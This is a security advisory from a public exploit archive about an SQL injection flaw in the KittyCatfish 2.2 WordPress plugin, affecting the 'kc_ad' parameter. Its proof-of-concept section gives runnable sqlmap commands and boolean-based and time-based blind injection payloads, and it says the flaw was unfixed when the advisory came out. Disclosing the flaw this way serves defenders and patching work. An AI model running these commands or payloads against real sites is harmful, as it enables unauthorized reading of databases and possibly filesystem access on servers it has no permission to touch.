63 lines
No EOL
1.6 KiB
Text
63 lines
No EOL
1.6 KiB
Text
# Exploit Title: KittyCatfish 2.2 Plugin for WordPress - SQL Injection
|
|
# Date: 20/03/2017
|
|
# Exploit Author: TAD GROUP
|
|
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
|
|
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
|
|
# Version: 2.2
|
|
# Contact: info[at]tad.group
|
|
# Website: https://tad.group
|
|
# Category: Web Application Exploits
|
|
|
|
|
|
1. Description
|
|
|
|
An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.
|
|
|
|
The get oarameter 'kc_ad' is vulnerable.
|
|
|
|
|
|
2. Proof of concept
|
|
|
|
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0"" —dbms —threads=10 —random-agent
|
|
|
|
OR
|
|
|
|
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql —level 5 —risk=3
|
|
|
|
Parameter: kc_ad (GET)
|
|
|
|
Type: boolean-based blind
|
|
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
|
|
Payload: kc_ad=31 AND 2281=2281&ver=2.0
|
|
|
|
|
|
|
|
Type: AND/OR time-based blind
|
|
|
|
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
|
|
|
Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0
|
|
|
|
|
|
|
|
3. Attack outcome:
|
|
|
|
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
|
|
|
|
4. Impact
|
|
|
|
Critical
|
|
|
|
5. Affected versions
|
|
|
|
<= 2.2
|
|
|
|
6. Disclosure timeline
|
|
|
|
06-Mar-2017 - found the vulnerability
|
|
06-Mar-2017 - informed the developer
|
|
20-Mar-2017 - release date of this security advisory
|
|
|
|
Not fixed at the date of submitting this exploit. |